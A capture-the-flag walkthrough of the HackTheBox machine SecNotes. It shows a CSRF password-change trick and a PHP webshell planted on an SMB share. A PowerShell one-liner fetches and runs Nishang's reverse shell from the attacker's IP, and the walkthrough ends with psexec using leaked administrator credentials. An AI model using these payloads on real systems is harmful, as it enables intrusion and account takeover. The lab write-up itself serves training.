SecNotes
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.97 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed May 18 21:07:21 2022 as: nmap -sS -p- -n -Pn -oN allPorts 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.046s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
8808/tcp open ssports-bcast
# Nmap done at Wed May 18 21:09:39 2022 -- 1 IP address (1 host up) scanned in 138.01 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,445,8808 10.10.10.97 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed May 18 21:14:15 2022 as: nmap -sCV -p80,445,8808 -Pn -oN targeted 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h20m02s, deviation: 4h02m29s, median: 2s
| smb2-time:
| date: 2022-05-18T19:14:35
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2022-05-18T12:14:32-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 18 21:15:10 2022 -- 1 IP address (1 host up) scanned in 55.27 secondsExploitation
If we take a look at the website, we'll see a login panel in which we can sign up.
Let's create a new user named alfa8sa with the password alfa8sa.
Then, log in with the new user.
We'll see four options. We can create a new note, change our password, sign out, or contact the website owners. Not only that, but we can also see a message showing the tyler@secnotes.htb user.
Let's try to change our password to alfa9sa.
Before hitting submit, let's set up BurpSuite, and intercept the request.
Let's try to change the request type method from POST to GET.
If the website still changes the password, we could try to send this URL to the tyler user, and if he accesses it, his password will be changed to alfa9sa. Let's forward the request and see if it changes our password.
And we see that the password has been changed. Now we could try to send the following URL to tyler, so if he accesses it, his password will change to alfa9sa.
http://passage.htb/change_pass.php?password=alfa9sa&confirm_password=alfa9sa&submit=submit
Let's press on the Contact Us button, and send the URL.
Now, let's sign out, and try to log is as the user tyler with the password alfa9sa.
And we should be able to log in.
There are three notes. The one called New Site contains a share name and some credentials.
Let's try to access it.
smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //secnotes.htb/new-site
-Uusername and password separated by "%".
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 19 20:06:14 2018
.. D 0 Sun Aug 19 20:06:14 2018
iisstart.htm A 696 Thu Jun 21 17:26:03 2018
iisstart.png A 98757 Thu Jun 21 17:26:03 2018
7736063 blocks of size 4096. 3397922 blocks availableThere are two files, which seem to be from an IIS website. We saw on the nmap scan, that there was another web server on port 8808.
We could try to upload a webshell to the share which contains the IIS file, and then access the webshell from the browser. First, create a new file called webshell.php with the following content.
<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>And then upload it to the Samba share.
smb: > put webshell.php
putting file webshell.php as \webshell.php (0.0 kb/s) (average 0.0 kb/s)Then, we could execute commands by putting them on the cmd parameter from the following URL.
http://10.10.10.97:8808/webshell.php?cmd=whoami
Time to get a reverse shell. First, we'll have to copy the Invoke-PowerShellTcp.ps1 file from Nishang to our current directory.
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
Then, open it and paste the following line at the end of the file.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4444Now, set an HTTP server on the current directory with python.
python -m http.server 80
Finally, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
If now we access the following URL, the machine will download the Invoke-PowerShellTcp.ps1 file from our machine, and then it will send us a reverse shell as the tyler user. Then we could grab the user flag.
http://10.10.10.97:8808/webshell.php?cmd=powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')"
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.97] 51465
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
secnotes\tyler
type \users\tyler\desktop\user.txt
fde104ffb6c4f8610383d039a9182470Privilege Escalation
If we take a look at the desktop of the user tyler, we'll see a link file named bash.lnk. Which means that bash is probably installed in the system.
dir \users\tyler\desktop
Directory: C:\users\tyler\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/22/2018 3:09 AM 1293 bash.lnk
-a---- 8/2/2021 3:32 AM 1210 Command Prompt.lnk
-a---- 4/11/2018 4:34 PM 407 File Explorer.lnk
-a---- 6/21/2018 5:50 PM 1417 Microsoft Edge.lnk
-a---- 6/21/2018 9:17 AM 1110 Notepad++.lnk
-ar--- 5/19/2022 7:25 AM 34 user.txt
-a---- 8/19/2018 10:59 AM 2494 Windows PowerShell.lnkIf we execute the whoami command with bash we'll see that we are the root user.
bash -c "whoami"
rootLet's see if the root flag is inside the /root directory.
bash -c "ls -la /root"
total 8
drwx------ 1 root root 512 Jun 22 2018 .
drwxr-xr-x 1 root root 512 Jun 21 2018 ..
---------- 1 root root 398 Jun 22 2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxrwxrwx 1 root root 512 Jun 22 2018 filesystemThere is no flag, but we see the .bash_history file with some content. Let's see what's in it.
bash -c "cat /root/.bash_history"
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exitWe get the administrator credentials. Let's get a shell as the nt authority\system user on the machine with psexec utility from impacket. Then, all we have to do is reap the harvest and take the root flag.
impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file pCRSiJqK.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service bIED on 10.10.10.97.....
[*] Starting service bIED.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> type \users\administrator\desktop\root.txt
b05c9c122675dfcc403df0a8c75d29b9Last updated
Was this helpful?